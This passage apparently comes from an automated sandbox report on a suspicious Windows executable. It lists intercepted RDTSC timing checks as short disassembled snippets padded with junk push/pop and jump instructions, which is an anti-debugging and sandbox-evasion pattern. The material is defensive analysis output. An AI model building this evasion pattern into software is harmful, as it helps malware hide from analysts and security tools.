                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DBF04F second address: DBF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jo 00007FA944B21404h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DBF062 second address: DBF068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DBF068 second address: DBF06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DBF06C second address: DBF070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC2C80 second address: DC2CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA944B213F4h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC205C second address: DC206C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA944C70C8Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC206C second address: DC207A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007FA944B213E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC207A second address: DC2080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC2194 second address: DC219D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC231C second address: DC2329 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC2329 second address: DC232F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC232F second address: DC2352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA944C70C86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA944C70C96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC2352 second address: DC235C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC235C second address: DC2360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC2360 second address: DC2366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC24C5 second address: DC24C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC24C9 second address: DC24CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC24CD second address: DC24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC24D9 second address: DC24FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FA944B213E8h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC24FB second address: DC2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DCB3BC second address: DCB3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DCB3C2 second address: DCB3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DCB3CB second address: DCB3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9B6B second address: DC9B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA944C70C91h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9CD9 second address: DC9D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9D02 second address: DC9D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9E63 second address: DC9E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9FC2 second address: DC9FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FA944C70C86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9FD5 second address: DC9FDF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA944B213E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DCA179 second address: DCA183 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DCA183 second address: DCA1A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FA944B213E6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213F7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DC9050 second address: DC9056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD16C5 second address: DD16DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD16DD second address: DD16EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FA944C70C86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD16EC second address: DD16F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD16F1 second address: DD1705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jo 00007FA944C70C86h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD1705 second address: DD1709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD196C second address: DD1970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD346B second address: DD3471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3471 second address: DD3477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3477 second address: DD3481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DD3481 second address: DD349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C97h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DDDBD0 second address: DDDBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA944B213E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DDDBDB second address: DDDBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE44FE second address: DE4516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4516 second address: DE451F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE451F second address: DE4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4523 second address: DE4527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE4527 second address: DE454E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FA944B213E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE454E second address: DE4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6900 second address: DE6913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007FA944B213ECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6913 second address: DE6931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA944C70C98h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6931 second address: DE6964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA944B213F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AB4 second address: DE6ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6ABA second address: DE6AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AC0 second address: DE6AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DE6AC6 second address: DE6ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D0E9A6 second address: D0E9B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA944C70C86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D0E9B0 second address: D0E9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF301F second address: DF3040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FA944C70C92h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jp 00007FA944C70C86h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF3040 second address: DF3062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944B213EDh 0x00000009 jmp 00007FA944B213F1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DF6B14 second address: DF6B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5C4 second address: DFD5E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA944B213F9h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5E5 second address: DFD5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD5E9 second address: DFD5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD753 second address: DFD757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD757 second address: DFD784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FA944B213E8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFD784 second address: DFD78E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA944C70C86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFDC0C second address: DFDC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213EDh 0x00000009 jc 00007FA944B213E6h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFDC24 second address: DFDC38 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA944C70C8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: DFEAC7 second address: DFEACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038AD second address: E038B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038B1 second address: E038C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA944B213E8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FA944B213E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E038C7 second address: E038CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E1D86C second address: E1D88B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA944B213F8h 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F18 second address: E21F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F1C second address: E21F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E21F20 second address: E21F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007FA944C70C86h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FA944C70C8Ah 0x0000001a jno 00007FA944C70C9Fh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E261DB second address: E261DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3914E second address: E39152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39152 second address: E39158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39158 second address: E3915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39AC1 second address: E39AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA944B213F4h 0x00000008 jmp 00007FA944B213F2h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39D97 second address: E39DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA944C70C94h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FA944C70C92h 0x00000012 jmp 00007FA944C70C99h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E39DE2 second address: E39E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA944B213EAh 0x0000000a popad 0x0000000b push edi 0x0000000c jne 00007FA944B213F2h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FA944B213E6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A0F8 second address: E3A0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A0FD second address: E3A10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA944B213E6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A10D second address: E3A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C8Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007FA944C70C86h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A12F second address: E3A135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A135 second address: E3A139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A139 second address: E3A13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A13D second address: E3A145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A145 second address: E3A150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA944B213E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3A150 second address: E3A156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3B99B second address: E3B9B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA944B213F1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: E3B9B2 second address: E3B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1203E second address: D12042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12042 second address: D12046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12046 second address: D1204C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D1204C second address: D12052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D12052 second address: D12058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
